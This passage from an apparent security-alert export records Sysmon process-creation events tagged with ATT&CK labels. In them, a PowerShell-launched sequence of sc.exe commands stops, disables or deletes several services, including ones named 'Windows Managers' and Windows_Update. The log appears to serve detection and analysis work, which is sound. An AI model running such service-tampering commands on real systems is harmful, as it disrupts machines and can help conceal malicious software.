System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.408"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010ab422b00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:19:57.822",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.378 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e0412b00} +ProcessId: 1852 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfy Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfy Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.390164200Z"",""eventRecordID"":""3200"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.378\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e0412b00}\r\nProcessId: 1852\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: 
Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfy Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.378"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010e0412b00}"",""processId"":""1852"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfy Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:57.700",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.324 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-00102f402b00} +ProcessId: 7500 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.330289500Z"",""eventRecordID"":""3198"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.324\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-00102f402b00}\r\nProcessId: 7500\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.324"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-00102f402b00}"",""processId"":""7500"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:57.016",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.185 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e03c2b00} +ProcessId: 3936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.194032600Z"",""eventRecordID"":""3195"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.185\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e03c2b00}\r\nProcessId: 3936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:29.185"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010e03c2b00}"",""processId"":""3936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.978",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.122 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010443a2b00} +ProcessId: 2432 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.127247700Z"",""eventRecordID"":""3193"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.122\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010443a2b00}\r\nProcessId: 2432\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.122"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010443a2b00}"",""processId"":""2432"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.966",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.087 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001061392b00} +ProcessId: 7744 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows 
Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.090688700Z"",""eventRecordID"":""3192"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.087\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001061392b00}\r\nProcessId: 7744\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.087"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-001061392b00}"",""processId"":""7744"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.909",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.947 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-001086362b00} +ProcessId: 6544 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.956037500Z"",""eventRecordID"":""3189"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.947\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-001086362b00}\r\nProcessId: 6544\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
